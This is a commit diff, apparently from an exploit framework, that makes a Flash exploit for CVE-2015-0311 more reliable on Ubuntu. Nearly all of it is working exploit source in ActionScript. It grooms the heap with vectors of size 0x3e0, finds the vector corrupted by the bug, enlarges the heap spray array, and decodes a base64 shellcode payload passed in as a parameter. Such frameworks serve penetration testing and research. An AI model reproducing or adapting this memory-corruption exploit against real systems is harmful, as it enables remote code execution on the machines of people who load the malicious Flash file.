Land #5417, Improve reliability for CVE-2015-0311 on Ubuntu

external/source/exploits/CVE-2015-0311/Exploit.as

@@ -26,15 +26,20 @@ package
         private var b64:Base64Decoder = new Base64Decoder()
         private var payload:String
         private var platform:String
+        private var massage:Vector.<Object> = new Vector.<Object>(10000)
 
         public function Exploit() 
         {
             platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-            b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-            payload = b64.toByteArray().toString();
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)            
+            payload = b64.toByteArray().toString()
 
-            // defrag           
-            for (var i:uint = 0; i < 10000; i++) new Vector.<uint>(0x3e0)
+            for (var i:uint = 0; i < massage.length / 2; i++) {
+                massage[i] = new Vector.<uint>(0x3e0) 
+            }
 
             for (i = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
             ba.compress()
@@ -44,8 +49,10 @@ package
             try {
                 ba.uncompress()
             } catch (e:Error) { }
-            uv = new Vector.<uint>(0x3e0)
-            uv[0] = 0 
+
+            for (i = massage.length / 2; i < massage.length; i++) {
+                massage[i] = new Vector.<uint>(0x3e0) 
+            }
 
             var test:uint = li32(0)
             if (test == 0x3e0) {
@@ -54,6 +61,20 @@ package
                 Logger.log('[*] Exploit - corruption fail: ' + test.toString(16))
                 return // something failed
             }
+
+            
+            for (i = 0; i < massage.length; i++) {
+                if (massage[i].length == 0x3e0) {
+                    massage[i] = null
+                } else {
+                    Logger.log('[*] Exploit - corrupted vector found at ' + i)
+                    uv = massage[i]
+                    uv[0] = 0 
+                }
+            }
+
+            if (uv.length != 0xffffffff)
+                return
             
             exploiter = new Exploiter(this, platform, payload, uv)
         }

external/source/exploits/CVE-2015-0311/Exploiter.as

@@ -23,7 +23,7 @@ package
         private var payload_address:uint 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
-        private var spray:Vector.<Object> = new Vector.<Object>(51200)
+        private var spray:Vector.<Object> = new Vector.<Object>(80000)
 
         public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
         {

external/source/exploits/CVE-2015-0311/Logger.as

@@ -7,13 +7,10 @@ package
  
         public static function alert(msg:String):void
         {
-            if (DEBUG == 0)
-                return
-
             var str:String = "";
-            str += msg;
-            
-            trace(str);
+
+            if (DEBUG == 1)
+                str += msg;
             
             if(ExternalInterface.available){
                 ExternalInterface.call("alert", str);
@@ -22,13 +19,10 @@ package
 
         public static function log(msg:String):void
         {
-            if (DEBUG == 0)
-                return
-
             var str:String = "";
-            str += msg;
-            
-            trace(str);
+
+            if (DEBUG == 1)
+                str += msg;
             
             if(ExternalInterface.available){
                 ExternalInterface.call("console.log", str);